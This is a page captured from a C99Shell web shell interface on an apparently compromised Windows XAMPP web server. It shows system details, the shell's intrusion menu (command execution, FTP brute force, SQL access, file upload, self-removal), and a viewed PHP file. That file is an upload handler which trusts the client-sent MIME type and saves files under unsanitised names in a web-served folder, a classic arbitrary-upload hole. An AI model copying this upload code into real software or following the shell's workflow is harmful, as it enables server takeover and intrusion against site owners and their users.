!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\WebPageElements\   drwxrwxrwx
Free 4.97 GB of 239.26 GB (2.08%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     8.php (1.08 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Include Magic Quotes filter
require_once('MagicQuotes/strip_quotes.php');

// If the form has been submitted...
if ( isset( $_POST['submit'] ) ) {

    
// If the file is a GIF image...
    
if ( $_FILES['image']['type'] == 'image/gif' ) {

        
// Copy the file from temporary storage to final destination
        
copy ($_FILES['image']['tmp_name'], "./files/".$_FILES['image']['name'] )
            or die (
"Could not copy");

        
// Display some information about the file
        
echo ( "File Upload Complete<br />\n" );
        echo ( 
"Name: ".$_FILES['image']['name']."<br />\n" );
        echo ( 
"Size: ".$_FILES['image']['size']."<br />\n" );
        echo ( 
"Type: ".$_FILES['image']['type']."<br />\n" );
        echo ( 
"<img src=\"files/".$_FILES['image']['name']."\" />" );
    }

// ... otherwise display the form
} else {
?>
<form method="POST" action="<?php echo ($_SERVER['PHP_SELF']); ?>" enctype="multipart/form-data">
Upload a GIF image: <input type="file" name="image" />
<input type="submit" name="submit" value="Submit" />
</form>
<?php
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--